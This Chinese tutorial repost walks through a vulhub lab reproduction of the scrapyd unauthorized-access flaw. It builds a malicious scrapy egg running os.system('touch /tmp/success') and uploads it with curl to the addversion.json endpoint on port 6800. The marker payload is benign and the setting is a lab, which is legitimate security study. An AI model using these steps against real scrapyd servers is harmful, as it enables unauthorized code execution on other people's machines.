栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

vulhub漏洞复现61

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

vulhub漏洞复现61

 scrapyd 未授权访问漏洞

漏洞详情

scrapyd是爬虫框架scrapy提供的云服务,用户可以部署自己的scrapy包到云服务,默认监听在6800端口。如果攻击者能访问该端口,将可以部署恶意代码到服务器,进而获取服务器权限。

参考链接:

环境搭建

靶场:192.168.4.10_ubuntu

执行如下命令启动scrapyd服务:

#docker-compose up -d

环境启动后,访问`http://your-ip:6800`即可看到Web界面。

 

漏洞复现

1. 参考[攻击Scrapyd爬虫](https://www.leavesongs.com/PENETRATION/attack-scrapy.html),构造一个恶意的scrapy包:

#pip install scrapy scrapyd-client

 

2. 编辑 evil/__init__.py, 加入恶意代码

scrapy startproject evil

cd evil

scrapyd-deploy --build-egg=evil.egg

Vim  __init__.py

‘’’

import os

os.system(“touch /tmp/success”)

```

 

3. 向API接口发送恶意包:

```bash

curl http://your-ip:6800/addversion.json -F project=evil -F version=r01 -F egg=@evil.egg

```

 “touch  /tmp/success”

 

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/740122.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号